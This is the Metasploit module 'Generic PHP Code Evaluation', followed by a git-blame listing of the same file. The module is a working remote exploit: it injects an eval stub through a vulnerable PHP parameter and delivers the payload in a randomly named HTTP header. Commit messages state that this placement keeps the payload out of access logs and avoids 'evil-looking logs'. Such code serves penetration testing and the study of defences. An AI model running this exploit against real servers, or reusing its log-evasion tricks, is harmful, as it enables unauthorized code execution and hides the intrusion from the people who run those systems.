modules/exploits/unix/webapp/php_eval.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ManualRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Generic PHP Code Evaluation',
      'Description'    => %q{
        Exploits things like <?php eval($_REQUEST['evalme']); ?>
        It is likely that HTTP evasion options will break this exploit.
      },
      'Author'         => [ 'egypt' ],
      'License'        => BSD_LICENSE,
      'References'     => [ ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          # max header length for Apache,
          # http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize
          'Space'       => 8190,
          # max url length for some old versions of apache according to
          # http://www.boutell.com/newfaq/misc/urllength.html
          #'Space'       => 4000,
          'DisableNops' => true,
          'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
          'Compat'      =>
            {
              'ConnectionType' => 'find',
            },
          'Keys'        => ['php'],
        },
      'DisclosureDate' => '2008-10-13',
      'Targets'        => [ ['Automatic', { }], ],
      'DefaultTarget' => 0
      ))

    register_options(
      [
        OptString.new('URIPATH',   [ true,  "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),
        OptString.new('HEADERS',   [false,  "Any additional HTTP headers to send, cookies for example. Format: \"header:value,header2:value2\""])
      ])

  end

  def check
    uri = datastore['PHPURI'].gsub(/\?.*/, "")
    print_status("Checking uri #{uri}")
    response = send_request_raw({ 'uri' => uri})
    if response.code == 200
      return Exploit::CheckCode::Detected
    end
    vprint_error("Server responded with #{response.code}")
    return Exploit::CheckCode::Safe
  end

  def datastore_headers
    headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""
    headers_hash = {}
    if headers && !headers.empty?
      headers.split(',').each do |header|
        key, value = header.split(':')
        headers_hash[key] = value.strip
      end
    end
    headers_hash
  end

  def exploit
    # very short timeout because the request may never return if we're
    # sending a socket payload
    timeout = 0.01

    headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10)+10)
    stub = "error_reporting(0);eval($_SERVER[HTTP_#{headername.gsub("-", "_")}]);"

    uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(stub))
    print_status("Sending request for: http#{ssl ? "s" : ""}://#{rhost}:#{rport}#{uri}")
    print_status("Payload will be in a header called #{headername}")

    response = send_request_raw({
        'global' => true,
        'uri' => uri,
        'headers' => datastore_headers.merge(
            headername => payload.encoded,
            'Connection' => 'close')
      },timeout)
    if response and response.code != 200
      print_error("Server returned non-200 status code (#{response.code})")
    end

    handler
  end
end
fixes #198 ; generic php eval exploit 2008-10-13 05:55:10 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
fixes #198 ; generic php eval exploit 2008-10-13 05:55:10 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = ManualRanking`
fixes #198 ; generic php eval exploit 2008-10-13 05:55:10 +00:00
			`include Msf::Exploit::Remote::HttpClient`

			`def initialize(info = {})`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`super(update_info(info,`
Cosmetic 2011-10-18 09:56:33 +00:00			`'Name' => 'Generic PHP Code Evaluation',`
fixes #198 ; generic php eval exploit 2008-10-13 05:55:10 +00:00			`'Description' => %q{`
			`Exploits things like <?php eval($_REQUEST['evalme']); ?>`
			`It is likely that HTTP evasion options will break this exploit.`
			`},`
			`'Author' => [ 'egypt' ],`
			`'License' => BSD_LICENSE,`
			`'References' => [ ],`
			`'Privileged' => false,`
			`'Platform' => ['php'],`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`'Arch' => ARCH_PHP,`
			`'Payload' =>`
fixes #198 ; generic php eval exploit 2008-10-13 05:55:10 +00:00			`{`
update space requirements 2010-06-02 05:04:24 +00:00			`# max header length for Apache,`
			`# http://httpd.apache.org/docs/2.2/mod/core.html#limitrequestfieldsize`
			`'Space' => 8190,`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`# max url length for some old versions of apache according to`
			`# http://www.boutell.com/newfaq/misc/urllength.html`
update space requirements 2010-06-02 05:04:24 +00:00			`#'Space' => 4000,`
fixes #198 ; generic php eval exploit 2008-10-13 05:55:10 +00:00			`'DisableNops' => true,`
			'BadChars' => %q\|'"`\|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`'Compat' =>`
fixes #198 ; generic php eval exploit 2008-10-13 05:55:10 +00:00			`{`
			`'ConnectionType' => 'find',`
			`},`
			`'Keys' => ['php'],`
			`},`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2008-10-13',`
fixes #198 ; generic php eval exploit 2008-10-13 05:55:10 +00:00			`'Targets' => [ ['Automatic', { }], ],`
			`'DefaultTarget' => 0`
			`))`

			`register_options(`
			`[`
			`OptString.new('URIPATH', [ true, "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),`
Add headers to php_eval 2017-07-10 21:25:27 -04:00			`OptString.new('HEADERS', [false, "Any additional HTTP headers to send, cookies for example. Format: \"header:value,header2:value2\""])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00
fixes #198 ; generic php eval exploit 2008-10-13 05:55:10 +00:00			`end`

add a simple check for the generic php exploits 2009-09-10 05:24:03 +00:00			`def check`
			`uri = datastore['PHPURI'].gsub(/\?.*/, "")`
			`print_status("Checking uri #{uri}")`
			`response = send_request_raw({ 'uri' => uri})`
			`if response.code == 200`
			`return Exploit::CheckCode::Detected`
			`end`
Saving progress 2014-01-21 13:03:36 -06:00			`vprint_error("Server responded with #{response.code}")`
add a simple check for the generic php exploits 2009-09-10 05:24:03 +00:00			`return Exploit::CheckCode::Safe`
			`end`

Add headers to php_eval 2017-07-10 21:25:27 -04:00			`def datastore_headers`
			`headers = datastore['HEADERS'] ? datastore['HEADERS'].dup : ""`
			`headers_hash = {}`
			`if headers && !headers.empty?`
			`headers.split(',').each do \|header\|`
			`key, value = header.split(':')`
			`headers_hash[key] = value.strip`
			`end`
			`end`
			`headers_hash`
			`end`

fixes #198 ; generic php eval exploit 2008-10-13 05:55:10 +00:00			`def exploit`
			`# very short timeout because the request may never return if we're`
			`# sending a socket payload`
			`timeout = 0.01`

move the payload into a random X- header so it doesn't show up in access logs 2009-04-19 15:47:14 +00:00			`headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10)+10)`
don't leave unnecessary evil-looking logs 2011-05-12 22:46:43 +00:00			`stub = "error_reporting(0);eval($_SERVER[HTTP_#{headername.gsub("-", "_")}]);"`
move the payload into a random X- header so it doesn't show up in access logs 2009-04-19 15:47:14 +00:00
			`uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(stub))`
Print the full URI 2012-03-22 18:39:11 -06:00			`print_status("Sending request for: http#{ssl ? "s" : ""}://#{rhost}:#{rport}#{uri}")`
don't leave unnecessary evil-looking logs 2011-05-12 22:46:43 +00:00			`print_status("Payload will be in a header called #{headername}")`

finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00			`response = send_request_raw({`
make php findsock work again for php_eval and php_include 2009-06-20 05:50:52 +00:00			`'global' => true,`
move the payload into a random X- header so it doesn't show up in access logs 2009-04-19 15:47:14 +00:00			`'uri' => uri,`
Add headers to php_eval 2017-07-10 21:25:27 -04:00			`'headers' => datastore_headers.merge(`
move the payload into a random X- header so it doesn't show up in access logs 2009-04-19 15:47:14 +00:00			`headername => payload.encoded,`
Add headers to php_eval 2017-07-10 21:25:27 -04:00			`'Connection' => 'close')`
move the payload into a random X- header so it doesn't show up in access logs 2009-04-19 15:47:14 +00:00			`},timeout)`
add a simple check for the generic php exploits 2009-09-10 05:24:03 +00:00			`if response and response.code != 200`
			`print_error("Server returned non-200 status code (#{response.code})")`
			`end`
finished periodic missing CVE reference check (hint vulns w/o CVEs here!) 2010-03-10 05:58:01 +00:00
fixes #198 ; generic php eval exploit 2008-10-13 05:55:10 +00:00			`handler`
			`end`
move the payload into a random X- header so it doesn't show up in access logs 2009-04-19 15:47:14 +00:00			`end`